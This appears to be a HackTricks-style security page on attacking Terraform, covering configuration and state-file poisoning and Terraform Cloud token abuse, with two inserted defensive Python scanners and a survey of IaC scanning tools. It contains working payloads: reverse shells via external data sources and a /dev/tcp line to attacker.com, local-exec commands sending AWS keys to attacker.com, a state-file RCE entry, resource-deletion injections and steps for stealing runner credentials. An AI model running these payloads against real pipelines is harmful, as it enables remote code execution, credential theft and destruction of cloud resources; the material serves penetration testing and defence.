Terraform Security
Tip
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the Discord group or the telegram group or follow us on Twitter @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Basic Information
HashiCorp Terraform is an infrastructure as code tool that lets you define both cloud and on-prem resources in human-readable configuration files that you can version, reuse, and share. You can then use a consistent workflow to provision and manage all of your infrastructure throughout its lifecycle. Terraform can manage low-level components like compute, storage, and networking resources, as well as high-level components like DNS entries and SaaS features.
How does Terraform work?
Terraform creates and manages resources on cloud platforms and other services through their application programming interfaces (APIs). Providers enable Terraform to work with virtually any platform or service with an accessible API.
HashiCorp and the Terraform community have already written more than 1700 providers to manage thousands of different types of resources and services, and this number continues to grow. You can find all publicly available providers on the Terraform Registry, including Amazon Web Services (AWS), Azure, Google Cloud Platform (GCP), Kubernetes, Helm, GitHub, Splunk, DataDog, and many more.
The core Terraform workflow consists of three stages:
- Write: You define resources, which may be spread across multiple providers and services. For example, you might create a configuration to deploy an application on virtual machines in a Virtual Private Cloud (VPC) network with security groups and a load balancer.
- Plan: Terraform creates an execution plan describing the infrastructure it will create, update, or destroy based on the existing infrastructure and your configuration.
- Apply: On approval, Terraform performs the proposed operations in the correct order, respecting any resource dependencies. For example, if you update the properties of a VPC and change the number of virtual machines in that VPC, Terraform will recreate the VPC before scaling the virtual machines.
Terraform Lab
Just install terraform on your computer.
Here you have a guide and here you have the best way to download terraform.
RCE in Terraform: config file poisoning
Terraform doesn't have a platform exposing a web page or a network service we can enumerate, therefore the only way to compromise terraform is to be able to add/modify terraform configuration files or to be able to modify the terraform state file (see the chapter below).
However, terraform is a very sensitive component to compromise because it will have privileged access to different locations in order to work properly.
The main way for an attacker to compromise the system where terraform is running is to compromise the repository that stores the terraform configurations, because at some point they are going to be interpreted.
There are solutions that run terraform plan/apply automatically after a PR is created, such as Atlantis (see the Atlantis Security page in the references).
If you are able to compromise a terraform file there are different ways you can get RCE when someone executes terraform plan or terraform apply.
Terraform plan
Terraform plan is the most used command in terraform and developers/solutions using terraform call it all the time, so the easiest way to get RCE is to make sure you poison a terraform config file so that it executes arbitrary commands during terraform plan.
Using an external provider
Terraform offers the external provider which provides a way to interface between Terraform and external programs. You can use the external data source to run arbitrary code during a plan.
Putting something like the following in a terraform config file will run a rev shell when terraform plan is executed:
data "external" "example" {
program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"]
}
Using a custom provider
An attacker could publish a custom provider to the Terraform Registry and then add it to the Terraform code in a feature branch (example from here):
terraform {
required_providers {
evil = {
source = "evil/evil"
version = "1.0"
}
}
}
provider "evil" {}
The provider is downloaded during init and will run the malicious code when plan is executed.
You can find an example in https://github.com/rung/terraform-provider-cmdexec
Using an external reference
Both options mentioned are useful but not very stealthy (the second is stealthier but more complex than the first). You can perform this attack in a stealthier way by following these suggestions:
- Instead of adding the rev shell directly into the terraform file, you can load an external resource that contains the rev shell:
module "not_rev_shell" {
source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules"
}
You can find the rev shell code in https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules
- In the external resource, use the ref feature to hide the terraform rev shell code in a branch inside the repo, something like:
git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b
Terraform Apply
Terraform apply is executed to apply all the changes; it can also be abused to obtain RCE by injecting a malicious Terraform file with local-exec.
You just need to make sure a payload like the following ends up in the main.tf file:
// Payload 1 to just steal a secret. The AWS SDK/CLI read credentials from
// AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY, and the URL is quoted so the
// shell does not treat "&" as a background operator.
resource "null_resource" "secret_stealer" {
  provisioner "local-exec" {
    command = "curl \"https://attacker.com/?access_key=$AWS_ACCESS_KEY_ID&secret=$AWS_SECRET_ACCESS_KEY\""
  }
}
// Payload 2 to get a rev shell
resource "null_resource" "rev_shell" {
  provisioner "local-exec" {
    command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'"
  }
}
Follow the suggestions from the previous technique to perform this attack in a stealthier way using external references.
Secret exfiltration
You can have secret values used by terraform exfiltrated by running terraform apply after adding to a terraform file something like the following. nonsensitive() strips the sensitive marking, so terraform prints the value in the apply output instead of redacting it (output values are also written to the state file):
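As an added example (not part of the original page nor of any project it references), the following Python script statically scans Terraform configuration files for the constructs abused in the plan and apply sections above: data "external" sources, local-exec provisioners, required_providers entries whose source is outside an allowlist, and remote module sources (including ?ref=-pinned ones, whose content a reviewer has to fetch separately). It works on the raw HCL text, so it can run before terraform init/plan. That ordering matters: terraform plan is what executes the external program, so any control that needs a plan first (a plan-JSON policy, a post-plan hook) runs too late. The allowlist, file paths and the sample configuration are constructed for the example, and the matching is regex-based rather than a full HCL parser, so treat it as a pre-merge tripwire, not as a replacement for provider installation controls.

```python
import re
import sys
from pathlib import Path

# Hypothetical organisational allowlist of provider sources ("namespace/name"); adjust to taste.
ALLOWED_PROVIDER_SOURCES = {"hashicorp/aws", "hashicorp/google", "hashicorp/azurerm", "hashicorp/null"}

# Constructs that run a program on the machine executing terraform.
PATTERNS = {
    # data "external" runs `program` during terraform plan, whatever provider source backs it.
    "external_data_source": re.compile(r'^[ \t]*data[ \t]+"external"[ \t]+"([^"]+)"', re.M),
    # provisioner "local-exec" runs `command` during terraform apply.
    "local_exec_provisioner": re.compile(r'^[ \t]*provisioner[ \t]+"local-exec"', re.M),
    # Remote module sources pull code that is not in this repo (registry modules are not flagged here).
    "remote_module_source": re.compile(
        r'^[ \t]*source[ \t]*=[ \t]*"((?:git@|git::|github\.com/|https?://|ssh://)[^"]+)"', re.M),
}
PROVIDER_SOURCE = re.compile(r'^[ \t]*source[ \t]*=[ \t]*"([^"]+)"', re.M)
REQUIRED_PROVIDERS_OPEN = re.compile(r"required_providers[ \t]*\{")


def _line_of(text, offset):
    return text.count("\n", 0, offset) + 1


def _brace_body_span(text, open_idx):
    """Offsets (start, end) of the body between the brace at open_idx and its matching close."""
    depth = 0
    for i in range(open_idx, len(text)):
        if text[i] == "{":
            depth += 1
        elif text[i] == "}":
            depth -= 1
            if depth == 0:
                return open_idx + 1, i
    raise ValueError("unbalanced braces in required_providers block")


def find_required_provider_sources(text):
    """[(source, line)] for every provider declared in any required_providers block."""
    found = []
    for m in REQUIRED_PROVIDERS_OPEN.finditer(text):
        start, end = _brace_body_span(text, m.end() - 1)
        for sm in PROVIDER_SOURCE.finditer(text, start, end):
            found.append((sm.group(1), _line_of(text, sm.start())))
    return found


def scan_tf_text(text, path="<inline>"):
    """Scan one file's HCL text and return a list of finding dicts."""
    findings = []
    for kind, pat in PATTERNS.items():
        for m in pat.finditer(text):
            detail = m.group(1) if pat.groups else m.group(0).strip()
            findings.append({"file": path, "line": _line_of(text, m.start()), "kind": kind, "detail": detail})
    for source, line in find_required_provider_sources(text):
        if source not in ALLOWED_PROVIDER_SOURCES:
            findings.append({"file": path, "line": line, "kind": "unlisted_provider_source", "detail": source})
    return findings


def scan_tf_dir(root):
    """Scan every *.tf file below root (modules included); run this before terraform init/plan."""
    findings = []
    for p in sorted(Path(root).rglob("*.tf")):
        findings += scan_tf_text(p.read_text(encoding="utf-8", errors="replace"), str(p))
    return findings


# Constructed sample mirroring the payloads discussed on this page.
SAMPLE_MAIN_TF = '''
terraform {
  required_providers {
    aws = {
      source  = "hashicorp/aws"
      version = "~> 5.0"
    }
    evil = {
      source  = "evil/evil"
      version = "1.0"
    }
  }
}
provider "aws" {}
data "external" "example" {
  program = ["sh", "-c", "id"]
}
module "not_rev_shell" {
  source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b"
}
resource "null_resource" "secret_stealer" {
  provisioner "local-exec" {
    command = "env"
  }
}
'''

if __name__ == "__main__":
    results = scan_tf_dir(sys.argv[1]) if len(sys.argv) > 1 else scan_tf_text(SAMPLE_MAIN_TF, "sample/main.tf")
    for f in results:
        print(f"{f['file']}:{f['line']}: {f['kind']}: {f['detail']}")
    sys.exit(1 if results else 0)
```

Run it as `python3 tf_tripwire.py path/to/repo` in a pre-merge job; a non-zero exit blocks the PR before any automation (Atlantis, TFC) gets to run plan on it. Note that it flags data "external" regardless of which registry source backs the provider, which is exactly the case the "Replacing a blacklisted provider" section below relies on.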
output "dotoken" {
value = nonsensitive(var.do_token)
}
Abusing Terraform State Files
If you have write access to terraform state files but cannot change the terraform code, this research gives some interesting options to take advantage of the file. Even if you had write access to the config files, going through the state files is often stealthier, since it leaves no trace in the git history.
RCE via the state file
It's possible to create a custom provider and then replace one of the providers in the terraform state file with the malicious one, or add a fake resource that refers to the malicious provider.
The statefile-rce provider builds on that research and weaponizes this principle. You can add a fake resource and place any bash command you want to run in the command attribute. When a terraform run is launched, this will be read and executed during both the terraform plan and terraform apply stages. During terraform apply, terraform removes the fake resource from the state file after running your command, cleaning up after itself. More details and a full demo are available on the GitHub repository hosting the source code for this provider.
To use it directly, place the following anywhere inside the resources array and change the name and command attributes:
{
"mode": "managed",
"type": "rce",
"name": "<arbitrary_name>",
"provider": "provider[\"registry.terraform.io/offensive-actions/statefile-rce\"]",
"instances": [
{
"schema_version": 0,
"attributes": {
"command": "<arbitrary_command>",
"id": "rce"
},
"sensitive_attributes": [],
"private": "bnVsbA=="
}
]
}
Then, once terraform is executed, your code will run.
Deleting resources
There are 2 ways to delete resources:
- Insert a resource with a random name in the state file pointing to the real resource to delete
Because terraform will see that the resource shouldn't exist, it will destroy it (following the real resource ID indicated). Example from the previous page:
{
"mode": "managed",
"type": "aws_instance",
"name": "example",
"provider": "provider[\"registry.terraform.io/hashicorp/aws\"]",
"instances": [
{
"attributes": {
"id": "i-1234567890abcdefg"
}
}
]
},
- Modify the resource to be deleted in a way that cannot be applied as an in-place update (so it will be destroyed and recreated)
For an EC2 instance, changing the instance type is enough to make terraform delete and recreate it.
Replacing a blacklisted provider
If you encounter a situation where hashicorp/external is blacklisted, you can re-implement the external provider by doing the following. Note: we use a fork of the external provider published at https://registry.terraform.io/providers/nazarewk/external/latest. You can publish your own fork or re-implementation as well.
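The two state-file abuses above (a fake resource bound to a malicious provider, and a fake resource carrying the id of a real object so that plan destroys it) leave recognisable traces in the state JSON. As an added example, not code from the original page or from the statefile-rce project, the following Python script audits a state file before a run: it flags providers outside an allowlist, managed resources that the configuration no longer declares (terraform will plan a destroy for the real object whose id they carry) and instances whose only attribute is "id", which is typical of hand-written entries. The allowlist, the set of configured addresses and the sample state are constructed for the example; in practice the configured addresses would come from the HCL (for instance via hashicorp/terraform-config-inspect) or from the last trusted copy of the state.

```python
import json
import re
import sys

# Hypothetical allowlist of fully qualified provider addresses this pipeline is allowed to load.
ALLOWED_STATE_PROVIDERS = {
    "registry.terraform.io/hashicorp/aws",
    "registry.terraform.io/hashicorp/null",
}
_PROVIDER_RE = re.compile(r'provider\["([^"]+)"\]')


def provider_address(provider_field):
    """'provider["registry.terraform.io/hashicorp/aws"].eu' -> 'registry.terraform.io/hashicorp/aws'."""
    m = _PROVIDER_RE.search(provider_field or "")
    return m.group(1) if m else None


def resource_address(res):
    """Address as terraform prints it, e.g. aws_instance.web or module.net.data.aws_vpc.main."""
    parts = []
    if res.get("module"):
        parts.append(res["module"])
    if res.get("mode") == "data":
        parts.append("data")
    parts.append(f'{res["type"]}.{res["name"]}')
    return ".".join(parts)


def audit_state(state, configured_addresses, allowed_providers=ALLOWED_STATE_PROVIDERS):
    """Findings: providers outside the allowlist, managed resources the configuration no longer
    declares (terraform will plan to destroy the real object they point at), and instances whose
    only attribute is "id" (typical of hand-written entries)."""
    findings = []
    for res in state.get("resources", []):
        addr = resource_address(res)
        prov = provider_address(res.get("provider"))
        if prov not in allowed_providers:
            findings.append({"address": addr, "kind": "unlisted_provider", "detail": prov})
        if res.get("mode") == "managed" and addr not in configured_addresses:
            findings.append({"address": addr, "kind": "absent_from_config",
                             "detail": "plan will destroy the object with this id"})
        for inst in res.get("instances", []):
            attrs = inst.get("attributes") or {}
            if set(attrs) <= {"id"}:
                findings.append({"address": addr, "kind": "skeleton_instance", "detail": attrs.get("id")})
    return findings


def load_state(path):
    with open(path, encoding="utf-8") as fh:
        return json.load(fh)


# Constructed sample state: one legitimate resource plus the two injected entries discussed above.
SAMPLE_STATE = {
    "version": 4, "terraform_version": "1.6.0", "serial": 7,
    "lineage": "00000000-0000-0000-0000-000000000000", "outputs": {},
    "resources": [
        {"mode": "managed", "type": "aws_instance", "name": "web",
         "provider": 'provider["registry.terraform.io/hashicorp/aws"]',
         "instances": [{"schema_version": 1, "attributes": {
             "id": "i-0abc123def456789a", "ami": "ami-0123456789abcdef0", "instance_type": "t3.micro"}}]},
        {"mode": "managed", "type": "rce", "name": "backdoor",  # state-file RCE pattern
         "provider": 'provider["registry.terraform.io/offensive-actions/statefile-rce"]',
         "instances": [{"schema_version": 0, "attributes": {"command": "id", "id": "rce"}}]},
        {"mode": "managed", "type": "aws_instance", "name": "example",  # deletion pattern
         "provider": 'provider["registry.terraform.io/hashicorp/aws"]',
         "instances": [{"attributes": {"id": "i-1234567890abcdefg"}}]},
    ],
}
# Addresses the checked-out configuration declares; in practice derive them from the HCL
# (e.g. hashicorp/terraform-config-inspect) or from the previously trusted state.
CONFIGURED_ADDRESSES = {"aws_instance.web"}

if __name__ == "__main__":
    state = load_state(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_STATE
    for f in audit_state(state, CONFIGURED_ADDRESSES):
        print(f"{f['address']}: {f['kind']}: {f['detail']}")
```

Point it at a pulled copy of the remote state (`terraform state pull > state.json`) in the job that runs before plan; an "absent_from_config" hit on a managed resource is exactly the situation in which plan will print a destroy for an object nobody removed from the code.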
terraform {
required_providers {
external = {
source = "nazarewk/external"
version = "3.0.0"
}
}
}
Then you can use external as usual.
data "external" "example" {
program = ["sh", "-c", "whoami"]
}
Terraform Cloud speculative plan RCE and credential exfiltration
This scenario abuses Terraform Cloud (TFC) runners during speculative plans to pivot into the target cloud account.
Preconditions:
- Steal a Terraform Cloud token from a developer's machine. The CLI stores tokens in plaintext in ~/.terraform.d/credentials.tfrc.json.
- The token must have access to the target organization/workspace and at least plan permission. VCS-backed workspaces block apply from the CLI, but still allow speculative plans.
- Discover the workspace and VCS settings via the TFC API:
export TF_TOKEN=<stolen_token>
curl -s -H "Authorization: Bearer $TF_TOKEN" \
https://app.terraform.io/api/v2/organizations/<org>/workspaces/<workspace> | jq
- Cause code execution during a speculative plan using the external data source and the Terraform Cloud "cloud" block to target the VCS-backed workspace:
terraform {
cloud {
organization = "acmecorp"
workspaces { name = "gcp-infra-prod" }
}
}
data "external" "exec" {
program = ["bash", "./rsync.sh"]
}
Example rsync.sh to obtain a reverse shell on the TFC runner:
#!/usr/bin/env bash
bash -c 'exec bash -i >& /dev/tcp/attacker.com/19863 0>&1'
Run a speculative plan to execute the program on the ephemeral runner:
terraform init
terraform plan
- Enumerate and exfiltrate the injected cloud credentials from the runner. During runs, TFC injects provider credentials via files and environment variables:
env | grep -i gcp || true
env | grep -i aws || true
Files expected in the runner's working directory:
- GCP:
  - tfc-google-application-credentials (Workload Identity Federation JSON config)
  - tfc-gcp-token (short-lived GCP access token)
- AWS:
  - tfc-aws-shared-config (web identity/OIDC role assumption config)
  - tfc-aws-token (short-lived token; some orgs may use static keys)
- Use the short-lived credentials out-of-band to bypass the VCS gates:
GCP (gcloud):
export GOOGLE_APPLICATION_CREDENTIALS=./tfc-google-application-credentials
gcloud auth login --cred-file="$GOOGLE_APPLICATION_CREDENTIALS"
gcloud config set project <PROJECT_ID>
AWS (AWS CLI):
export AWS_CONFIG_FILE=./tfc-aws-shared-config
export AWS_PROFILE=default
aws sts get-caller-identity
With these credentials, attackers can create/modify/destroy resources directly using the native CLIs, bypassing the PR-based workflows that block apply through VCS.
- Defensive guidance:
- Apply least privilege to TFC users/teams and tokens. Audit membership and avoid over-privileged owners.
- Restrict plan permission on sensitive VCS-backed workspaces where possible.
- Enforce provider/data source allowlists with Sentinel policies to block data "external" or unknown providers. See HashiCorp guidance on provider filtering. Keep in mind that Sentinel policies are evaluated after the plan stage, so they stop the run from being applied but do not prevent the external program from having already executed on the runner during plan.
- Prefer OIDC/WIF over static cloud credentials; treat runners as sensitive. Monitor speculative plan runs and unexpected egress.
- Detect exfiltration of the tfc-* credential artifacts and alert on suspicious external program usage during plans.
Compromising Terraform Cloud
Abusing the token
As explained in this post, the terraform CLI stores tokens in plaintext in ~/.terraform.d/credentials.tfrc.json. Stealing this token allows an attacker to impersonate the user within the scope of the token.
Using this token it's possible to find the org/workspace with:
GET https://app.terraform.io/api/v2/organizations/acmecorp/workspaces/gcp-infra-prod
Authorization: Bearer <TF_TOKEN>
Then it's possible to run arbitrary code using terraform plan as explained in the previous chapter.
Escaping to the cloud
Then, as the runner is in a cloud environment, it's possible to obtain the token of the principal attached to the runner and use it out of band.
- GCP files (present in the working directory of the current run)
  - tfc-google-application-credentials: JSON config for Workload Identity Federation (WIF) telling Google how to exchange the external identity.
  - tfc-gcp-token: the short-lived GCP access token (~1 hour) mentioned above.
- AWS files
  - tfc-aws-shared-config: shared config for web identity federation/OIDC role assumption (preferred over static keys).
  - tfc-aws-token: short-lived token, or possibly static IAM keys if misconfigured.
Automated checking tools
Snyk Infrastructure as Code (IaC)
Snyk provides a comprehensive Infrastructure as Code (IaC) scanning solution that identifies vulnerabilities and misconfigurations in Terraform, CloudFormation, Kubernetes, and other IaC formats.
- Features:
- Real-time scanning for security vulnerabilities and compliance issues.
- Integration with version control systems (GitHub, GitLab, Bitbucket).
- Automated fix pull requests.
- Detailed remediation advice.
- Sign up: Create an account on Snyk.
brew tap snyk/tap
brew install snyk
snyk auth
snyk iac test /path/to/terraform/code
Checkov
Checkov is a static code analysis tool for infrastructure as code (IaC) and also a software composition analysis (SCA) tool for images and open source packages.
It scans cloud infrastructure provisioned using Terraform, Terraform plan, Cloudformation, AWS SAM, Kubernetes, Helm charts, Kustomize, Dockerfile, Serverless, Bicep, OpenAPI, ARM Templates, or OpenTofu and detects security and compliance misconfigurations using graph-based scanning.
It performs Software Composition Analysis (SCA) scanning, which is a scan of open source packages and images for Common Vulnerabilities and Exposures (CVEs).
pip install checkov
checkov -d /path/to/folder
terraform-compliance
From the docs: terraform-compliance is a lightweight, security and compliance focused test framework against terraform to enable negative testing capability for your infrastructure-as-code.
- Compliance: Ensure the implemented code is following security standards and your own custom standards
- Behaviour Driven Development: We have BDD for almost everything, why not for IaC?
- Portable: just install it from pip or run it via docker. See Installation
- Pre-deploy: it validates your code before it is deployed
- Easy to integrate: it can run in your pipeline (or in git hooks) to ensure all deployments are validated.
- Segregation of duty: you can keep your tests in a different repository where a separate team is responsible.
Note
Unfortunately, if the code uses certain providers you don't have access to, you won't be able to run terraform plan and therefore this tool (it needs the plan output, not just the HCL).
pip install terraform-compliance
terraform plan -out=plan.out
# -f: directory with your BDD feature files, -p: the plan file to check
terraform-compliance -f /path/to/features -p plan.out
tfsec
From the docs: tfsec uses static analysis of your terraform code to spot potential misconfigurations.
- Checks for misconfigurations across all major (and some minor) cloud providers
- Hundreds of built-in rules
- Scans modules (local and remote)
- Evaluates HCL expressions as well as literal values
- Evaluates Terraform functions e.g. concat()
- Evaluates relationships between Terraform resources
- Compatible with the Terraform CDK
- Applies (and embellishes) user-defined Rego policies
- Supports multiple output formats: lovely (default), JSON, SARIF, CSV, CheckStyle, JUnit, text, Gif.
- Configurable (via CLI flags and/or config file)
- Very fast, capable of quickly scanning huge repositories
brew install tfsec
tfsec /path/to/folder
terrascan
Terrascan is a static code analyzer for Infrastructure as Code. Terrascan allows you to:
- Seamlessly scan Infrastructure as Code for misconfigurations.
- Monitor provisioned cloud infrastructure for configuration changes that introduce posture drift, and enable reverting back to a secure posture.
- Detect security vulnerabilities and compliance violations.
- Mitigate risks before provisioning cloud native infrastructure.
- Offers flexibility to run locally or integrate with your CI\CD.
brew install terrascan
terrascan scan -d /path/to/folder
KICS
Find security vulnerabilities, compliance issues, and infrastructure misconfigurations early in the development cycle of your infrastructure-as-code with KICS by Checkmarx.
KICS stands for Keeping Infrastructure as Code Secure; it is open source and is a must-have for any cloud native project.
docker run -t -v $(pwd):/path checkmarx/kics:latest scan -p /path -o "/path/"
References
- Atlantis Security
- https://alex.kaskaso.li/post/terraform-plan-rce
- https://developer.hashicorp.com/terraform/intro
- https://blog.plerion.com/hacking-terraform-state-privilege-escalation/
- https://github.com/offensive-actions/terraform-provider-statefile-rce
- Terraform Cloud token abuse turns speculative plan into remote code execution
- Terraform Cloud permissions
- Terraform Cloud API: Show workspace
- AWS provider configuration
- AWS CLI: OIDC role assumption
- GCP provider: Using Terraform Cloud
- Terraform: Sensitive variables
- Snyk Labs: Gitflops: dangers of Terraform automation platforms